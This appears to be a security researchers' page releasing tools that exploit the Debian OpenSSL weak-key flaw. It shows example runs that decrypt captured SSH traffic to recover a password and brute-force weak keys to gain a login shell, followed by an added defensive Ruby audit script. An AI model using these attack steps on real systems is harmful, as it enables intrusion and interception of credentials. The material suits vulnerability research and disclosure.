SSH tools related to the OpenSSL/Debian vulnerability
About these tools
We (Raphaël Rigo, Romain Raboin and Julien Tinnes) gave a short talk at SSTIC 08 about some of the tools we and Yoann Guillot wrote after the OpenSSL/Debian advisory to remotely discover vulnerable keys in authorized_keys files, decipher SSH traffic and retrieve DSA private keys (even from non-weak keys). We also wrote an article in French in this MISC issue.
For now we have disclosed the following tools (we might add other tools soon):
ssh_kex_keygen: a tool to retrieve the Diffie-Hellman session key in an SSH conversation capture involving at least one OpenSSH running with a vulnerable OpenSSL. Key recovery will take half a minute on decent hardware.
Be aware that this tool doesn't parse a pcap file, nor does it decipher the traffic for you; it has to be used in a higher-level program such as ssh_decoder in order to be useful.
ssh_decoder: a tool to decipher an SSH session from a pcap file (uses ssh_kex_keygen). This will allow you to retrieve passwords or public SSH keys used for authentication that may be vulnerable and to read older SSH traffic.
bfssh: a multi-threaded tool written in C to retrieve weak keys in authorized_keys files on a remote machine. It'll test for all possible keys for a given architecture in less than five minutes on a decent network. You'll need a vulnerable libssl/libcrypto and libssh to compile/use it.
Example 1 (ssh_kex_keygen)
./keygen -g $MYGROUP -k $MYSNIFFED_GA -b 256 -s -p 0-32767 -n 4
KEY : 00301439070BCC051E15569D2F7F9BD0ABBD3AA8755AC939B53EED39D266251C3377435
PID : 30149
Example 2 (ssh_decoder)
$ tcpick -wRC -wRS -r pcapssh_putty.cap
Starting tcpick 0.2.1 at 2008-07-09 17:37 CEST
Timeout for connections is 600
tcpick: reading from pcapssh_putty.cap
1 SYN-SENT 172.24.94.237:52363 > 172.24.83.255:ssh
1 SYN-RECEIVED 172.24.94.237:52363 > 172.24.83.255:ssh
1 ESTABLISHED 172.24.94.237:52363 > 172.24.83.255:ssh
1 FIN-WAIT-1 172.24.94.237:52363 > 172.24.83.255:ssh
1 TIME-WAIT 172.24.94.237:52363 > 172.24.83.255:ssh
1 CLOSED 172.24.94.237:52363 > 172.24.83.255:ssh
tcpick: done reading from pcapssh_putty.cap
69 packets captured
1 tcp sessions detected
$ ls tcpick*
tcpick_172.24.94.237_172.24.83.255_ssh.clnt.dat tcpick_172.24.94.237_172.24.83.255_ssh.serv.dat
$ ruby ssh_decoder.rb tcpick*
* read handshake
cipher: aes256-ctr, mac: hmac-sha1, kex_hash: sha1, compr: none
* bruteforce DH
DH shared secret : 00c81a4d4fe19a522a972bb9ede9d5901.....(cut)
* derive keys
* decipher streams
* successful authentication packet
{:username=>"toto",
:nextservice=>"ssh-connection",
:auth_method=>"password",
:change=>0,
:password=>"toto"}
* deciphered streams saved to "sshdecrypt.0.client.dat" & "sshdecrypt.0.server.dat"
Example 3 (bfssh)
$ ./bfssh -h ssllol -u toto -p22 -d6 -t rsa -s 2048 -a x86
== BFSSH a strong debian weak key bruteforcer ==
MaxAuthTries: 6
STATUS: thread: 5 test key: 05790 ... 05795
Authentication success: ./key-x86/rsa2048/id_rsa.05784.pub
$ ssh -i ./key-x86/rsa2048/id_rsa.05784 toto@ssllol
[snip]
$ id
uid=1000(toto) gid=1000(toto) groups=4(adm),109(admin),1000(toto)
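Added example, not part of the original page or of the tools it describes: the defensive counterpart of Example 3, a local audit that flags blacklisted keys in an authorized_keys file by MD5 fingerprint. It assumes a blacklist in the layout used by Debian's openssh-blacklist files (the MD5 fingerprint with its first 12 hex digits removed, one list per key type and size); audit_authorized_keys, ssh_fields, sample_line and the sample data are constructed for illustration.

```ruby
require 'base64'
require 'digest'
require 'set'
KEY_RE = %r{(?:\A|\s)(ssh-rsa|ssh-dss)\s+([A-Za-z0-9+/]+={0,2})(?:\s|\z)}

# Split a public key blob into its length-prefixed fields (SSH wire format).
def ssh_fields(blob)
  fields, pos = [], 0
  while pos < blob.bytesize
    len = blob.byteslice(pos, 4).unpack1('N')
    raise ArgumentError, 'truncated key blob' if len.nil? || pos + 4 + len > blob.bytesize
    fields << blob.byteslice(pos + 4, len)
    pos += 4 + len
  end
  fields
end

# Return [line_number, "TYPE-BITS", md5_hex] for every blacklisted key in text.
# blacklist (assumed layout): { "RSA-2048" => Set of 20-hex-digit fingerprint tails }
def audit_authorized_keys(text, blacklist)
  hits = []
  text.each_line.with_index(1) do |line, no|
    next if line.lstrip.start_with?('#')
    m = KEY_RE.match(line) or next
    begin
      blob = Base64.strict_decode64(m[2])
      fields = ssh_fields(blob)
    rescue ArgumentError
      next # not a well-formed key blob
    end
    rsa = m[1] == 'ssh-rsa'
    size_field = rsa ? fields[2] : fields[1] # RSA modulus n, or DSA prime p
    next unless fields[0] == m[1] && size_field
    label = "#{rsa ? 'RSA' : 'DSA'}-#{size_field.unpack1('H*').to_i(16).bit_length}"
    fp = Digest::MD5.hexdigest(blob)
    hits << [no, label, fp] if blacklist.fetch(label, Set.new).include?(fp[12, 20])
  end
  hits
end

# Constructed sample: two made-up 2048-bit "RSA" blobs (not real keys); only the first is blacklisted.
def sample_line(fill, comment)
  blob = ['ssh-rsa', "\x01\x00\x01", "\x00".b + fill.b * 256].map { |f| [f.bytesize].pack('N') + f }.join
  "ssh-rsa #{Base64.strict_encode64(blob)} #{comment}\n"
end
SAMPLE_KEYS = "# constructed sample file\n" + sample_line("\xC3", 'toto@old-host') +
              'command="/bin/true",no-pty ' + sample_line("\xA5", 'backup@new-host')
SAMPLE_BLACKLIST = { 'RSA-2048' => Set[Digest::MD5.hexdigest(Base64.strict_decode64(SAMPLE_KEYS.lines[1].split[1]))[12, 20]] }
audit_authorized_keys(SAMPLE_KEYS, SAMPLE_BLACKLIST).each { |no, label, fp| puts "line #{no}: blacklisted #{label} key, MD5 #{fp}" }
```

A clean result covers only blacklisted keys: as noted above, DSA private keys can be retrieved even when the key itself is not weak, which a fingerprint check cannot detect.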